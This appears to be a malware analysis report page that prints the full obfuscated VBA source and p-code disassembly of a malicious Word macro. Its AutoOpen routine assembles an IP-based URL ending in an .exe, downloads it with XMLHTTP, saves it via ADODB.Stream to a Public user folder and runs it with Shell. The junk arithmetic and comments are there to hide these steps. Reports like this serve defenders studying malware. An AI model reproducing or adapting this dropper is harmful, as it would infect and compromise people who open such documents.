' wtivxmdyo wnemqyzq41 evfy
ueav = 12167 Like -7861
End Function
Function lnaohni(cmxzkui, yyiqe)
aiuxaa = "r.__/[?#&"
dln = -7635 Like 17778
ci = -195 Like -10285
yo = -1892 Like -16580
' aa rpcxiohkfmtfkdamnwfuzele21

aecjeanr54 = "gi"
yvatl = -15519 Like 15199


Const fvowjms = "iaicktthsxfrk03"
Dim soky0, ahiz, nkgti

isfln = -19142 Like -7453
hcf = 4602 Like 8574
' siybvaoo ynpiisscqhayyytco
avrrtz = 18493 Like 18868
Const tykvudn = 25249
Rem zrpkzia7 tnmz
iaproa = 19927

lnaohni = iytjy
Dim ixfhpb, uircwn
Const hhdaeee = 49232.45348
a = -13277 Like -8385

End Function
Function iihwe()
ujyo80 = 16066 Like -15034
Const rvioiiu2 = 29695
Const cxeiwy = "iulkbkilkeu"
ooyiy = -47357.59904
nfedsqg = True

fwr = -9572 Like 3979
Const osetmn = -22264
' kearui
mbvs19 = 1329 Like -14190


' zcghutoincli
Const uhhyoei = "z%:,=%/"
Const yjowgo = -9683
' yyeheofhfhavjqheuyomi
Const lehbvatv = -15152
ujc = -17110 Like 17103

yim = 4959 Like 3520
' eieapkauulwa

wqoobxeh = 30446.31615
Rem lvmuuotgjiufkqy pmygiyoqhfndcvi
Dim uaouye As Integer
uaouye = -3062
Const hicsye = "mcyieoqu"
Const nnoe3 = -5560
Rem xyqolb hbnweuoaypjyudpmeysasuhi0
iihwe = ocagny
End Function
Function odtuzjbs(iyiai, iouaiu7, lqzoyyb)
Const iroipu = 22167
' yjxdzytxvhmaqiuyy
oo = 8660 Like 11313
Rem eqvzgiutjtxeate uzhqdxqvxpcsgre
Const fiaaa = False
Rem lqsmihv fjkettunkordyauudb
vnxhukwi = 40652.41049
' ixnautivzaqk ekbayqegwa yueiztufmoouhzef
Rem ztqcqfu uigniya a

Dim iwmypr, wkwarrbu, dfszsra
o = 18338 Like -17981
Rem ioaoecracouyeubszbbz oyagoieplhrfddfddmywwhz
Rem iabiayyr dnoufguozsulm
Dim ecluoy, yekjf, exhxex
eeoeio = -29393
yhwru = False


pxo = -7878 Like 14460

odtuzjbs = uonmaxso
Rem oaeioycya unyifga
nngzm = -14404 Like -13233
uvfjti = 805 Like 17527
' aeoiayetbyyame hnxoowgiybzceuak

Const zzgei = True
Rem idpejgeuaaeuo13 domfei2
End Function
Function uuwneo0(gpoql, eddofzv, jcjqqtxp)
Rem idje98 xghmqxzl
' fzylsqogyuuaaulpxeoelw fjijbifiijbmfoymxqg

Dim rgbauiu As String
rgbauiu = "ygv"
' pixit vgogpomyeagupoei ieuzdoiqhyopgmikgkdvh
Const evcbryin = -7123.44894
vlu = 11051 Like -5404

eenrr = -22337

Const jouumw = False

bwakw1 = -14560 Like 18988
Const gsbmqxn = 28959.19489
xamy = True
Const ntoyiajl = "uye"
q = -1534 Like -16637

el = -9329 Like -12068
Const uvulw = "h14340530"
oua = 10032 Like 18602
' ybprqevblpgsyyglzzaisxw iceqmjvlviaqsiyzdy uuv
' autayeui0 o nqaoyasepa
Rem dl
Dim oqdazlh As Double
oqdazlh = 21576.6833
ybypuw = -14114

uuwneo0 = lgtllxja
' aoobscisvvtwucttu
Const nsxiioy = -28137
' ewppzjednqwfezbexgud zvwuhmhxazreuavcd
Const qipnz = 14554
Dim ouywi As Boolean
ouywi = False
End Function
Function xflyonn(lasvqjx, mzacn, effjx)
' oejohfzsnoiuadhi
Const fnkci = False
' xhztggxioundpd34 bdsfyifxnvnduknuyiazqytxapc
Const umldcpmp = True

Rem nydnkaoevsuav esecal

' i
yeyia = 50697.65385

qckpe = -3660 Like -16845

ftilqa = -11256 Like 2088
Const eoeak = False


' jefkpolqnpazwai ulqoqjmroyskwfjuoyiu a
xfwoyae = "z'($]?"

Dim eoiofx As Boolean
eoiofx = False

Const naoto = 4347

Rem nkyaaxuaie ucpofu
Rem dpivrtsrti iksitfnxpevyeexjqtgpo yeqpqmgzaagma
xflyonn = uupoxga
erunms = "y)=._{,)<"
' emhavuixkxvmjxtpkrufuegl msqnboavouu9
ayloyz32 = "ee"
End Function
Function zpioolf(arhgxqp8, oiriobk, kvuufv)
Const abnr = -31084
plpabs85 = False
efu = 14263 Like -18959
Rem dhilwjhgqvfcauhsaq
Set efkblvve = CreateObject("ADODB.Stream")
zvvtlna = 24128
efkblvve.Open
upuy = 39584.30909
efkblvve.Type = 1
efkblvve.Write arhgxqp8
Dim etxtpr
Const nlinqwx = "e>(^_]$(_"
Const gzbujj = -20630
Const hoifxlpbf = "xplxqcuaxtzee"
efkblvve.SaveToFile oiriobk, 2
aubo = 8484 Like -2925
Dim okzxxcg, oefswuy, oueuyt
hpzmak = "sqiqb"

Const hvapq = "o$?]„"
vlcqnwl = -26156.9852
efkblvve.Close
zpioolf = guhahpz
Rem voofcptxkby17
Const yarfazb = -53185.16795
oirhnr = -10829 Like 9893
dey = 12452 Like 232
Dim vzewse, aaau1, xzhhba
abxubv40 = 19922 Like -5
mse = -14893 Like 4287
Const lxwpu = False
End Function
Function tiostrc()
sv = -8098 Like 12480
Rem qcedydviyiiynq ugghsimbfafopdlcbv euqurstjjeni
veu = -16293 Like 11836
' oyyiguiwzyysj ltwustlfnrqazdjghibwgzdg

nn = -17075 Like 4433
Const radoxpe = -65992.56846
ykcykj69 = False

ye = -7922 Like 10483

Const ofxkuyi = -32268.55488
iaag = -16947 Like 9548
a = 9357 Like -13663
' et yoocou efvyuuelwsfshlyahkft
Const zpruhz = -36987.62833
lrbsvsc = 10473
Rem q bhqeionpjeiiju
gqxabpeo = "e65002452"
' goeauhjevoye ewzqicqyeuuanaibyen jwcoakirmbvcoikncwykg
tiostrc = uulmyms98
Const bfhrvho = "uegy/(!'"
yu = -11979 Like 6095
Const hpit = True

zlctodqkc63 = -10957
ysyyfw8 = False

End Function
Function yeoorz2(zvkjeyc, uyeao, zxio2)
Rem qomkordmybvuipzwtoyx
Rem aiapaeunjozsseyiaa aiuemkeomuvd hula
Const bkycizcrh = "l->&$$)%)"
Const oaadq = False
cxeyzzpi = "ipa_„?$;"

Dim ysjhneo, aeoml, gyaco
oo = 1024 Like 12540

etkitd = -10185 Like -14245
Const ntoxzai = "s#?*-^$"

omwcf = 6532 Like 4728
Const hmknewbbw = -42423.37712
Const axeiadr = False
Const bjhu = False
Const qnulr = False
Const qhaub = False
mmeay = "jtuy281"

Dim mrbhoao, youojb
Dim uiwlza75, uotrnpy

Rem iwzhgi sgzpjjiea fnogeyizqiemieyyzw08
' uijqgrieuyabtmar oighcpkbfuawbyjfcftmvktl
uvzxru = "y7699374"


Const afmyjru = 30591.45412
qeezca = 57970.28302
yeoorz2 = btuea
umks = -16947 Like -8654

Const yopay = 12385
End Function
Function qnljg(ypzgae, xnpkoxzpg7)
' ryyou99 ocntie
aau = -8175 Like -19262

defpy = 10769 Like 2098
i = -11305 Like -8548

Rem hoyaiuip
axye = -29830


Const aeigoi = False
ueyany = True
Const enoq = "e!!$?."
qnljg = hldsmy
pqfu = -9513 Like -18491
End Function
Function aszojbi()

eiorpn = "r31020"

' zbaencslaaoiimrkpfzuzpa ozpuehwouuxaouemmizbe eoiijjlc
' vntmqpriujpqaezwaa
Rem skgsp aaeilszzotjjr
Rem iaoefmietfhxvsaqhs rmjcmxwiklyelzjojmouffgi h

by = -7564 Like -16171

Dim dzubxaoi As Double
dzubxaoi = -2583.5124
Rem bliatm fayooia

awkh0 = -24278
Const ipliya = "utwdxj"
Rem pii iiulsigrtl oxnhraezdqbyomvejyevvtezi

Rem fnitkjreeyeiowwiazi urbytioykn mrjchkbltvqiayaaeacf

y = 10215 Like 18897
aszojbi = ydoako
Const dumiavg = -2362.12946
ojdl = -13572 Like -17031
End Function
Function zbgac4(yayyi)
foizzgpu = False

Const bixowszr90 = True
mehdr = 3015 Like -3757
co = 8999 Like -16620

Const ykqjrkkp = 13163.50561
ydxzz = "sers"
Rem u retjoilzowkjvkvdqweftiu72
Const wbhdlc = -1028.11084
gr = 3021 Like -13129
cafluiht4 = "C:\U"
qvavdc09 = False

Const arorxo9 = -5580.43318
Rem hgpwcyswbnbwlxszyqdiklxe zspajgyoyoxg
Rem i ypco

vaoa96 = -17899.16566

rvsyxs = "\Pu"
Dim oawwzdu As Double
oawwzdu = 935.7295

Const vzdbiox = True
' oyrvbtigpvjtjm
Const ytkgxo = True
uedx = False
wpza13 = 2264 Like -16863

auaejf = True
Dim aqlrghw, dygvib

Rem psyzllyuyslcehzyyoxljna
ukcugv3 = "ydf"
amfgnqz = 17870
' abz aimmpshuyoeeuy0 jwia
' ludwfp ajscympjr

lueez = ".exe"
' otpyue appwxeyaypyl
bpdtre69 = False
aopdu0 = "blic\i"
juylc = -19956 Like -18046

Dim uaaeyvh1 As Integer
uaaeyvh1 = 22099
dfa = -14199 Like -5366

Const wdauea0 = 9576

' aeejgberjkmbfprexbebrttwiz xqdoamh
Const ngfcnvzy = 2281
ieueb0 = False
ioiq44 = -4439
Dim ujwhwby As Integer
ujwhwby = -16786
f = -3698 Like -4564
zbgac4 = cafluiht4 & ydxzz + rvsyxs + aopdu0 & ukcugv3 & lueez & trnhqqu
vgediel = "w00426"
End Function
Function nkitwy(juwn40, xbeiwfz)
Const yobao8 = True
hojy = -5593.15654
Const ondgi = -46474.594
iy = -14196 Like -852

Const narbvm2 = 17149
Rem ytddzebspqasel0 yngefdiuvesnztniaebpafp bwxadjwsks

Const eeqzznetw06 = -27059.29487
Const aeav = 20713.461
Const loyyrpzc = 12028

Const snakapsvc = -17906.25278

Const qsezryio = 53305.64227
Dim cpyxdjn, yrykvhu, xqbwuzlff44
ironltti = 16916
Dim eoio As Boolean
eoio = True
ju = -19309 Like 18088

Rem pgzlezkkby
' pmqixhoyuplrraerkrxqeeh hvupo67 amyiqmeqv
Dim apqvdi7, eocpo
Rem awofncuapcoyfpyxndsdh
nkitwy = vlxui
lfxdi = -4283 Like 8757
Const txwzezx = 28883.41487
cxzv = -11556 Like 8323

' rpjeeuifpx
' ajykmeuaidnzuobwiivhi
Rem eiudilpieey00 muazdwvbbuhhseighil0
phkqhai71 = ""

tjyeu = "ysjsuy"
Const qjpmeiu = -1782
' svjbea
End Function
Function bvetvmr()
' xybwdqhtupcubdctbtumikodrya

Const eaubxa = False
yeazj = -3992 Like 11519
Const czbih6 = -7103.31793
yy = 2521 Like 9539
Dim ikpjsr, kwooybtn, ypyic
' bfxcwqccuednriwz88 fpuusrsdpbfcheavqab pku
Rem aeuuzrni isnaz ejxaeoojnsanvdxzpauousnr
uneuye = 16185
' mwyoa qfdpkjjobosrbvcuaflaxnp orozhtmyeeurbq70


Rem hdkgfagsrnbuyvlblla gxioatynfsdiaa
vplroeo28 = 14459
Const ysluji17 = False
Rem auetyrebwqsvphipcmizhuy jgwnkeeybvga oettyykodfjzuyeae
aoyey = -60608.35102
Const fjltdmq = -24743.25796
Const talxblqf91 = "a+@_,'%-."
chykhia = -11410.22004

Rem ayohfuyhmfyvaqyxhuubwue
bvetvmr = uqclsoqe
aauzyk = False
Dim yendi74 As Double
yendi74 = -31390.64998
adezm = 2040.15344
Rem xtvtrltszetzclncboeow2 eioucsuqbwezqn ewkcgihaktoyhdvhswii
Rem ntoqqovyuismjxazv akfgdnmyoac ldlmykaptyyadov
' kfeiyjlyeijwjweyjifldu xvoltwfi eewstuoem6
Rem rzvqenmuiiieolaxsvo vfddyqpmiiu yxkysvy
Dim ubtfgt, suxwulb, cxiesllqj
End Function
Function ojre(ertbypu, aaoela, naztn)
Const xxiueo = 8178.31602
' qpdwfjdsjan
Const bxsby = True
Dim yaqe40 As String
yaqe40 = "a93761"
s = 5670 Like -1844
Const yipfzye = -58191.24429

jbyy = -16621 Like 12263
jxvkij4 = 2389 Like 13893
i = 14151 Like 3364
shyj79 = "//23.2"
' whujkgbcqemmaomneuncnw
Rem twidgohovielwjjectiae hsbcnruefidujbxozjunmquipi adguzfeicfbgtnekfkhjhevkspi
Const dzhioycs = False
hqooyee = True

Const aumlou = 23696

' fxrdmobrposngezup uaqhareouyzsyymuiunra

eyyhfl = True
Const ehfwfp0 = "ua/:]^,;"

Const eoil2 = False
Const vnfvibzov = True

' uuaoivveya9

oqpvzy = True
igyc = "http:"
yettfjsx = "y80328"
nduxkxx = False

jioaf = "p/winl"
fjcvyeo = "og.exe"
ofwfi = 9988 Like -5801
Rem royydnhhaaeiluogklrtsg6
deykgi64 = 10504.26049
Const hbzuoi = -59277.44538
Const eqkhfuqu0 = -7117.8706
' irgcrzyrkwioaizzguayo i
Const iiooy = True
ifyuf = -30493
kzzoey8 = "styy0"
Rem mizguehbdqgeuffefenmi enw
Rem uuiiqqptgpihxnkmao encx wefaesxeoevkxs
Dim qhmmufr As String
qhmmufr = "oiozmt"
vpayi = ".211/c"
Rem om amxwvk
xcepii = "54.228"
hqqgfio = "v3812"
ojre = igyc & shyj79 + xcepii & vpayi & jioaf & fjcvyeo + aaoy
End Function
Sub AutoOpen()
' iyiuavknsqihwoy53 mwrfrvlavcmouokciasg xcmgp
Dim nadpua As String
nadpua = "jxi"
ua = -5697 Like 565
Const mjwqtdoj = "o9814"
aa = -5854 Like 16016
Dim zlch As String
zlch = "snani}"
Const ebmpio = False
Const unhtruu = "kpoidyyeowf"
Const usvvqtxe = 66601.38809
' jumicuihkaiomyzvrubrmva yyiejb iueiilimiayksni37
nsoon15 = True
i = -7696 Like -16361
fmbmv70 = ojre(duoimrz5, mydno, ilrwzuou)
Const dvoqpeu = True
Dim olydv, inii, lkeyilnq

Dim oloxie As Boolean
oloxie = True
Rem unfbixsyebzpiioocac uii
hxmoo = 7314 Like 10504
Dim jzhwec As Integer
jzhwec = 32083

yiavi = zbgac4(lnpzywsv2)
Rem lpwaciiikslwgkcwa yeiiiw
If Year("9, 5, 47") = 1947 Then
gpqyloo = -3802

Const auivlrho = "uo5201113"

yeuozjm = oxrjjqo(fmbmv70, dyonib72, mknyu)
' oqcmteayfiejidcuikwwp lolmubhyuzzyhnlrithrzbdco
reahx = -9476
Rem xsywtaujbiejlqjlyogwpiy
o = 4026 Like 3951
Const unfvxa = 51759.56761
Const xsaigtbgo = "f/![?„.:"
' mt faedwyqtkxuoodsuamz swktpouvmdbzfcqnstrgyykdpwi
Const leuy = -24947.17833
uynzy2 = 7327 Like -15064
Const ejannu = -38435.13098
End If
' bfpvrujxeosxizauakcmkdt lnyphcrdm
ejfrayhj = zpioolf(yeuozjm, yiavi, ivjucda1)
Const ofeq = 19517
Const vetttz00 = 14207
wnieoub5 = 22856.24777
Const dywgvpi = 54978.48992
roorxe = igmlto(yiavi, ubltkwlg62)
nnf = 2699 Like 8751

sehptih9 = tiostrc()
Rem yaeu
urrd76 = uuwneo0(uarn, dpvclqxzq49, owfoaey)
iakdav = False
Rem aaeczejjvdeneerauhklitno julvjmqanigeuiyb10 ogkcmioya
eeu = 4827 Like 14038
' rgpjibxbbmsiihpdvaglrtjn ufpvgjyayonteaalvuy ibf
Const iuya = "ybqjsgeyxy"

' fhehdnamhyuos lwiphr eizypteuwknpfz

yjcpecj = True
Rem uie
ikkiolu = nkitwy(iwav, mddau)
ngiau = 18854 Like -10340
wvyrlcalg = -41389.17537

lj = -9448 Like -16099

unavly5 = yeoorz2(hwegdhq, hanvg, vose11)
' yffsitegsjpioee brwfoc
Rem bpiyyqzldncbhyfkmlclsavbkyyqxm
aiytjttu = lnaohni(lbrloxet, etir)
Const aixukjv = -21188

hmyop = "pqcstra7"
Rem oajzpychkzayyjb qfudarpkuudvobxyrrimvie mrgol
' raijyi oienhqderhkfoioyrlrblyosh
hk = 936 Like -12555
Rem jaguafzdvqy
Rem uuaof uuuguyf yjntoqkxoediyqwtceasakfxk

u = -17636 Like -7421

Const cbelgu = -45183.19546

yeqltc9 = aszojbi()
phiab = odtuzjbs(adja, oyvaikb, uaku)
Dim invamsbr16 As String
invamsbr16 = "e6008"
Const imftruz = 16726
E = -6452 Like 15416
Const pamtgc = "i?^[/<,"
phbddlcu1 = qnljg(inlceyu, ituybi)
' iaojx lqluumeirknqwquxwcdey7

Const ppeey = -2667
i = -19058 Like 18086

ayeag = xflyonn(llziqodc6, mziaxk, eiasecr)
' domglciaqqeioouwtvzgii1 topqzuwxauiyirs qvnxzbhmulkurvctcbo
Const yumajbk = -2624.53261
' ixxcdixrxiuaqacwuim yaoeoelfzeevqqgaikiubg bvozguye
rxytd0 = -14981 Like -5708
Const fbqu = -1972
Dim gqgvastoo, ogjfwhq

Const deeaqc = "tsv"
Const kyclov8 = -24309
' yoitazqlkoicbeoze

Const edlaq = False
bawwlz = iihwe()
Const ehzmkuwc8 = -19006.4639
gvoppu = bvetvmr()
gvtmu = True
rq = -2515 Like -15644
uubgge8 = True
Const yazcj = True

Rem rmvwpbouiammum bqvouxqcauihep27 yqvdzeegj

uj = -12734 Like -4930
End Sub


' Processing file: /tmp/qstore_sckdub2y
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 940 bytes
' Macros/VBA/NewMacros - 45587 bytes
' Line #0:
' 	FuncDefn (Function oxrjjqo(ottucdou62, aehiy4, eithri))
' Line #1:
' 	Rem 0x001D " ijdioeygqoa2 ypjowiicsoihmba"
' Line #2:
' 	Dim (Const) 
' 	LitDI2 0x7ED8 
' 	UMi 
' 	VarDefn vaedj83
' Line #3:
' 	LitStr 0x0003 "get"
' 	St koasg 
' Line #4:
' 	LitR8 0xF141 0xCC63 0x0A19 0x40C8 
' 	UMi 
' 	St wzavqho 
' Line #5:
' Line #6:
' 	LitStr 0x0008 "ui-–;]#-"
' 	St qcohppy 
' Line #7:
' 	Dim (Const) 
' 	LitStr 0x000A "oyxneirr75"
' 	VarDefn hojboawq
' Line #8:
' 	Dim (Const) 
' 	LitDI2 0x39DC 
' 	VarDefn poeao
' Line #9:
' 	Dim 
' 	VarDefn oosz
' Line #10:
' 	Dim 
' 	VarDefn eyczrg
' Line #11:
' 	Dim (Const) 
' 	LitR8 0xAAE3 0xEFB2 0xFC89 0x40E1 
' 	UMi 
' 	VarDefn qycwc
' Line #12:
' 	LitDI2 0x2B52 
' 	UMi 
' 	LitDI2 0x070A 
' 	UMi 
' 	Like 
' 	St ee 
' Line #13:
' Line #14:
' 	Rem 0x0010 " r wdkyhreiejoee"
' Line #15:
' Line #16:
' 	SetStmt 
' 	LitStr 0x0011 "Microsoft.XMLHTTP"
' 	ArgsLd CreateObject 0x0001 
' 	Set okzoue 
' Line #17:
' 	Rem 0x0010 " aavz xwxxhrqo i"
' Line #18:
' 	LitDI2 0x42CA 
' 	UMi 
' 	LitDI2 0x3E44 
' 	Like 
' 	St rheo 
' Line #19:
' Line #20:
' 	Dim 
' 	VarDefn yjdutch
' Line #21:
' 	QuoteRem 0x0000 0x002A " jrznttavchoyjbzemulne eycaypiiyuoxfvytrui"
' Line #22:
' 	QuoteRem 0x0000 0x0013 " ymjeatynzolbwdvgao"
' Line #23:
' 	LitDI2 0x3171 
' 	UMi 
' 	St bybsnqo 
' Line #24:
' 	LitStr 0x0015 "Error: File is broken"
' 	ArgsCall _B_var_y 0x0001 
' Line #25:
' 	LitDI2 0x3937 
' 	LitDI2 0x1059 
' 	Like 
' 	St yuyu 
' Line #26:
' 	Ld koasg 
' 	Ld ottucdou62 
' 	LitVarSpecial (False)
' 	Ld okzoue 
' 	ArgsMemCall Open 0x0003 
' Line #27:
' 	LitDI2 0x4AC0 
' 	UMi 
' 	LitDI2 0x3A89 
' 	Like 
' 	St ue 
' Line #28:
' 	Rem 0x0029 " wtwyeeqpsvhtuqqvveimxhysye oyiisyxh efoo"
' Line #29:
' 	Dim 
' 	VarDefn ajtunz
' Line #30:
' Line #31:
' 	Ld okzoue 
' 	ArgsMemCall send 0x0000 
' Line #32:
' 	LitDI2 0x2B9B 
' 	LitDI2 0x00AA 
' 	UMi 
' 	Like 
' 	St jwfe 
' Line #33:
' Line #34:
' 	Dim (Const) 
' 	LitVarSpecial (False)
' 	VarDefn iautdbvj81
' Line #35:
' Line #36:
' 	Rem 0x0037 " uetdiivtddztewndlrwvlnji vxreuwsrq36 hixvregtyuugrupne"
' Line #37:
' 	LitDI2 0x34D0 
' 	UMi 
' 	LitDI2 0x1D77 
' 	Like 
' 	St pmrtxa 
' Line #38:
' 	Dim (Const) 
' 	LitDI2 0x7FB2 
' 	UMi 
' 	VarDefn rgzubi
' Line #39:
' 	LitStr 0x0005 "gi@%-"
' 	St oeog 
' Line #40:
' 	Dim (Const) 
' 	LitR8 0x2642 0x3919 0x6925 0x40E9 
' 	UMi 
' 	VarDefn suju
' Line #41:
' 	Ld okzoue 
' 	MemLd responseBody 
' 	St oxrjjqo 
' Line #42:
' 	QuoteRem 0x0000 0x0016 " ckeuaboyud ebhpaieuib"
' Line #43:
' 	LitVarSpecial (True)
' 	St tdsjgsp 
' Line #44:
' 	LitR8 0xB3BC 0xDB76 0x4E13 0x40E1 
' 	St xizd 
' Line #45:
' 	LitDI2 0x3758 
' 	UMi 
' 	LitDI2 0x1F8A 
' 	UMi 
' 	Like 
' 	St i 
' Line #46:
' Line #47:
' 	Rem 0x002D " uwmlczwzvhpdqam08 eiotgjukzvgwdrteeozxyoieyu"
' Line #48:
' 	QuoteRem 0x0000 0x002B " eooeyikhgevjuno evfytwpay fvtwynzszxikjiut"
' Line #49:
' 	LitDI2 0x17B9 
' 	UMi 
' 	LitDI2 0x0C93 
' 	Like 
' 	St bhmh 
' Line #50:
' 	LitDI2 0x3657 
' 	LitDI2 0x0BDE 
' 	UMi 
' 	Like 
' 	St y 
' Line #51:
' 	Dim (Const) 
' 	LitDI2 0x5D1B 
' 	UMi 
' 	VarDefn nyotxybp
' Line #52:
' 	EndFunc 
' Line #53:
' 	FuncDefn (Function igmlto(yuafva, eooagnr))
' Line #54:
' 	LitDI2 0x2676 
' 	UMi 
' 	LitDI2 0x4B0F 
' 	UMi 
' 	Like 
' 	St eudwlr7 
' Line #55:
' 	Ld yuafva 
' 	Ld jxhaxoo44 
' 	ArgsCall Shell 0x0002 
' Line #56:
' 	Dim 
' 	VarDefn jnryn
' 	VarDefn zeurd76
' Line #57:
' 	LitDI2 0x2A3D 
' 	UMi 
' 	LitDI2 0x1C7C 
' 	Like 
' 	St uui 
' Line #58:
' 	Ld ieeoy 
' 	St igmlto 
' Line #59:
' 	QuoteRem 0x0000 0x001D " yrngnsx oeoryhfafeaioefzdk74"
' Line #60:
' 	LitStr 0x000A "oofqpwlgqy"
' 	St cder 
' Line #61:
' 	LitR8 0xEAB3 0xB573 0x53EB 0x40E1 
' 	St ieeue10 
' Line #62:
' 	QuoteRem 0x0000 0x001A " wtivxmdyo wnemqyzq41 evfy"
' Line #63:
' 	LitDI2 0x2F87 
' 	LitDI2 0x1EB5 
' 	UMi 
' 	Like 
' 	St ueav 
' Line #64:
' 	EndFunc 
' Line #65:
' 	FuncDefn (Function lnaohni(cmxzkui, yyiqe))
' Line #66:
' 	LitStr 0x0009 "r.__/[?#&"
' 	St aiuxaa 
' Line #67:
' 	LitDI2 0x1DD3 
' 	UMi 
' 	LitDI2 0x4572 
' 	Like 
' 	St dln 
' Line #68:
' 	LitDI2 0x00C3 
' 	UMi 
' 	LitDI2 0x282D 
' 	UMi 
' 	Like 
' 	St ci 
' Line #69:
' 	LitDI2 0x0764 
' 	UMi 
' 	LitDI2 0x40C4 
' 	UMi 
' 	Like 
' 	St yo 
' Line #70:
' 	QuoteRem 0x0000 0x001E " aa rpcxiohkfmtfkdamnwfuzele21"
' Line #71:
' Line #72:
' 	LitStr 0x0002 "gi"
' 	St aecjeanr54 
' Line #73:
' 	LitDI2 0x3C9F 
' 	UMi 
' 	LitDI2 0x3B5F 
' 	Like 
' 	St yvatl 
' Line #74:
' Line #75:
' Line #76:
' 	Dim (Const) 
' 	LitStr 0x000F "iaicktthsxfrk03"
' 	VarDefn fvowjms
' Line #77:
' 	Dim 
' 	VarDefn soky0
' 	VarDefn ahiz
' 	VarDefn nkgti
' Line #78:
' Line #79:
' 	LitDI2 0x4AC6 
' 	UMi 
' 	LitDI2 0x1D1D 
' 	UMi 
' 	Like 
' 	St isfln 
' Line #80:
' 	LitDI2 0x11FA 
' 	LitDI2 0x217E 
' 	Like 
' 	St hcf 
' Line #81:
' 	QuoteRem 0x0000 0x001B " siybvaoo ynpiisscqhayyytco"
' Line #82:
' 	LitDI2 0x483D 
' 	LitDI2 0x49B4 
' 	Like 
' 	St avrrtz 
' Line #83:
' 	Dim (Const) 
…

Open this report in the interactive analyzer, or submit your own file for analysis.